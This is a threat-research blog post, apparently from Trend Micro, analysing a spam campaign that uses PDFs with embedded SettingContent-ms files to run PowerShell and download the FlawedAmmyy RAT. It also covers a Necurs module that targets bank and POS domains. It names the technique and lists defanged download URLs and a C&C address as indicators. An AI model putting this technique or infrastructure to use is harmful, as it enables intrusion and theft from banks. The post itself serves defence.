By Anita Hsieh, Rubio Wu, and Kawabata Kohei
Trend Micro detected a spam campaign that drops the same FlawedAmmyy RAT (remote access Trojan) used by a Necurs module to install its final payload on bots under bank- and POS-related user domains. The spam campaign was also found abusing SettingContent-ms – an XML format shortcut file that opens Microsoft’s Windows Settings panel. Malicious SettingContent-ms files were found embedded in a PDF document that drops the aforementioned RAT.
Figure 1. The volume of spam emails in July 12 and 13
From our research and analysis of spam emails sent on July 12 and 13, more than 50 percent of the email accounts that received this spam belonged to banks located in countries like Malaysia, Indonesia, Kenya, Romania, Poland, and Austria.
Figure 2. Infection chain of the spam campaign
Once the “downl.SettingContent-ms” file is opened, Windows will run the PowerShell command inside the <DeepLink> tag, which will download the FlawedAmmyy RAT from hxxp://169[.]239[.]129[.]117/cal before executing it. This FlawedAmmyy RAT variant is the same one installed by a Necurs module on bots under bank- and POS-related user domains.
Figure 8. The content of the “downl.SettingContent-ms file that contains the PowerShell command for downloading the FlawedAmmyy RAT
FlawedAmmyy RAT – the spam campaign’s connection to Necurs
Recently, Necurs has been showing interest in bots with specific characteristics. On July 12, Necurs pushed a module – a downloader of the FlawedAmmyy RAT – to its bots. The module checked if the domain name contained any of the following keywords: bank, banc, aloha, aldelo, and postilion (as seen in Figure 10). Aloha is a restaurant POS system, Aldelo is an iPad POS system, while Postilion is a solution for acquiring payments or transactions across all channels, from ATM and POS to ecommerce and mobile. It downloads and executes the final payload from hxxp://169[.]239[.]129[.]117/Yjdfel765Hs if the bot’s user domain matches Necurs’ criteria.
Figure 9. The module obtained the bot’s user domain via the cmd command echo %%USERDOMAIN%%
Figure 10. The module checks if the user domain contains any of the highlighted keywords
Trend Micro Solutions
To defend against spam and threats like Necurs, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs.
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.
Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
Indicators of compromise (IoCs)
|SHA256||Necurs module that checks if the bot is potentially bank- or POS-related|
|SHA256||PDF used in the spamming campaign on July 12 and 13|
|SHA256||FlawedAmmyy RAT dropped by the Necurs module and the spam campaign on July 12|
|185[.]99[.]132[.]119:443||IP + Port||C&C of the FlawedAmmyy RAT|
|hxxp://169[.]239[.]129[.]117/Yjdfel765Hs||URL||URL used to download the FlawedAmmyy RAT in the Necurs module|
|hxxp://169[.]239[.]129[.]117/cal||URL||URL used to download the FlawedAmmyy RAT in the SettingContent-ms file embedded in the PDF|